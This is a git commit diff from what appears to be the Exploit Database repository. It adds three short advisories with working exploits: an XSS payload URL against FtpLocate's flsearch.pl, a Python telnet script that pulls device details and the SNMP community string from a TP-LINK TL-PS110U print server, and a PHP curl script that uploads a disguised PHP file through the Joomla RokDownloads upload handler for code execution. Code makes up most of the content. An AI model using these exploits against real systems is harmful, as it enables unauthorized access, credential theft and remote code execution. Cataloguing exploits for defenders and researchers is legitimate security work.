DB: 2015-11-02

Offensive Security · Offensive Security · commit c559949c05a3 · 2015-11-02T05:03:00.000Z
3 new exploits
diff --git a/files.csv b/files.csv
@@ -34864,3 +34864,6 @@ id,file,description,date,author,platform,type,port
 38588,platforms/php/webapps/38588.php,"bloofoxCMS 'index.php' Arbitrary File Upload Vulnerability",2013-06-17,"CWH Underground",php,webapps,0
 38589,platforms/linux/dos/38589.c,"Linux Kernel <= 3.0.5 'test_root()' Function Local Denial of Service Vulnerability",2013-06-05,"Jonathan Salwan",linux,dos,0
 38590,platforms/php/webapps/38590.txt,"et-chat Privilege Escalation and Arbitrary Shell Upload Vulnerabilities",2013-06-18,MR.XpR,php,webapps,0
+38591,platforms/hardware/remote/38591.py,"TP-LINK TL-PS110U Print Server 'tplink-enum.py' Security Bypass Vulnerability",2013-06-19,SANTHO,hardware,remote,0
+38592,platforms/php/webapps/38592.php,"Joomla! RokDownloads Component Arbitrary File Upload Vulnerability",2013-06-19,Am!r,php,webapps,0
+38593,platforms/cgi/webapps/38593.txt,"FtpLocate HTML Injection Vulnerability",2013-06-24,Chako,cgi,webapps,0
diff --git a/platforms/cgi/webapps/38593.txt b/platforms/cgi/webapps/38593.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60760/info
+
+FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+FtpLocate 2.02 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script> 
diff --git a/platforms/hardware/remote/38591.py b/platforms/hardware/remote/38591.py
@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/60682/info
+
+TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability.
+
+Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive information which may aid in further attacks.
+http://drupal.org/node/207891 
+
+import telnetlib
+import sys
+host = sys.argv[1]
+tn = telnetlib.Telnet(host)
+tn.read_until("Password:")
+tn.write("\r\n")
+tn.read_until("choice")
+tn.write("1\r\n")
+tn.read_until("choice")
+tn.write("1\r\n")
+data = tn.read_until("choice")
+for i in data.split("\r\n"):
+    if "Device Name" in i:
+        print i.strip()
+    if "Node ID" in i:
+        print i.strip()
+tn.write("0\r\n")
+tn.read_until("choice")
+tn.write("2\r\n")
+data = tn.read_until("choice")
+for i in data.split("\r\n"):
+    if "Manufacture:" in i:
+        print i.strip()
+    if "Model:" in i:
+        print i.strip()
+tn.write("0\r\n")
+tn.read_until("choice")
+tn.write("5\r\n")
+data = tn.read_until("choice")
+for i in data.split("\r\n"):
+    if "Community" in i:
+        print i.strip()
diff --git a/platforms/php/webapps/38592.php b/platforms/php/webapps/38592.php
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/60690/info
+
+The RokDownloads component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+<?php
+
+  $uploadfile="Amir.php.gif";
+
+  $ch = 
+  curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
+  curl_setopt($ch, CURLOPT_POST, true);
+  curl_setopt($ch, CURLOPT_POSTFIELDS,
+                array('Filedata'=>"@$uploadfile"));
+  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+  $postResult = curl_exec($ch);
+  curl_close($ch);
+  print "$postResult";
+
+  ?>
